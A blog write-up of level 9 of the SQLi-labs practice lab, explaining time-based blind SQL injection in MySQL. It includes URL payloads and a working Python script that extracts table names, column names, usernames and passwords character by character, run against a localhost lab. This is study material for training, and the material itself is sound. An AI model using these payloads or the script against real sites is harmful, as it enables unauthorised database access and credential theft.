
sqlilabs less9

2022-07-01 14:06:00 It's always late at night.

The hint for the ninth level says it is time-based blind injection. First, let's look at the functions we will need.

sleep(time): available from MySQL 5 onward. It pauses the query for time seconds and then returns 0, so inside a larger expression it behaves like a false value once the delay is over (that detail matters for the script later).

benchmark(count, expr): evaluates expr count times. It is meant for measuring how fast MySQL executes an expression, but with a large count it also produces a measurable delay, so it can stand in for sleep() where sleep() is not available.

if(condition, when_true, when_false): if condition holds, the result is when_true; otherwise it is when_false. (The original shows two screenshots here: one with the condition satisfied, one with it not satisfied.)

First, determine the injection type.
I tried 1', 1" and 1 and the page did not react to any of them. Why no reaction? My guess is that the server only ever sends the "You are in..." text, whatever the query does, so we need some other way to tell whether the condition is correct. That is where time-based blind injection comes in: judge whether the condition holds by observing how long the response takes.
The server-side logic is probably something like this, with both branches printing the same thing:

if ((select * from tables where id = value) returns a row)
    print You are in.....
else
    print You are in.....

OK, let's practice.
With the first payload there is no waiting time at all.
With the single-quote payload the page waits five seconds. What does that tell us? The id is wrapped in quotes, so this is string (character) injection.
Next, determine the number of columns.
Once the column count is known, move on to the next step.
The length of the database name turns out to be 8.
Then find the database name itself.
Then find the table names.
Column names and row values are obtained in exactly the same way.
Doing time-based blind injection by hand is far too tedious, though. Consider Burp Suite, or a hand-written script.

import requests

def zr(url, zrname):
    # characters to try at each position; MySQL's default collation compares
    # strings case-insensitively, so the lowercase letters also match uppercase
    # ones. Digits and a few symbols are added so names like admin1 are not cut short;
    # a character outside this set ends the extraction early.
    array1 = "abcdefghijklmnopqrstuvwxyz0123456789_-.,@!$ "
    # marker that only appears in the page's "no row" branch: when the guess is
    # right, sleep(0.1) returns 0, the WHERE clause becomes false, and the
    # response contains the font color 0000ff (see below)
    proof = "0000ff"
    tmp = zrname
    zrname = ''
    for i in range(1, 100):
        url1 = url + str(i) + ',1)=\''
        found = False
        for s in array1:
            url2 = url1 + s + '\',sleep(0.1),1)%23'
            r = requests.get(url2)
            if proof in r.text:
                zrname += s
                found = True
                break          # character found, go to the next position
        if not found:
            break              # nothing matched: substr() is past the end of the string
    print(tmp + ": " + zrname)


zr('http://localhost/sqlilabs/Less-9/?id=1\' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),', 'tablename')
zr('http://localhost/sqlilabs/Less-9/?id=1\' and if(substr((select group_concat(column_name) from information_schema.columns where table_name = \'users\'),', 'columnslist')
zr('http://localhost/sqlilabs/Less-9/?id=1\' and if(substr((select group_concat(username) from users),', 'usernamelist')
zr('http://localhost/sqlilabs/Less-9/?id=1\' and if(substr((select group_concat(password) from users),', 'passwordlist')

Ah, but why is the judgment condition 0000ff?
Look at what the script sends: if(substr(...)='c', sleep(0.1), 1). When the guess is right, the branch taken is sleep(0.1), which returns 0 after the delay, so the WHERE clause becomes id='1' and 0, no row comes back, and the page takes its "no row" branch. I noticed that the response for a correct guess contains this string (a font color attribute in the HTML):
(screenshot: response for a correct guess, containing 0000ff)

and the response for a wrong guess (and 1, the row is returned) does not:
(screenshot: response for a wrong guess, without 0000ff)

So the script is really using that HTML marker as a boolean oracle; the 0.1 s sleep is only there to produce a false value, and the script never measures time, which is why it finishes quickly. A genuine time-based check would instead compare the response time (r.elapsed) against a threshold larger than the sleep.

To sum up
When the page shows only one result, so that neither the injection type nor the truth of a condition can be read from the content, use time-based blind injection and judge correctness by the waiting time instead.


Copyright notice
This article was written by [It's always late at night.]; when reposting, please include the original link. Thanks.
https://yzsam.com/2022/182/202207011403445756.html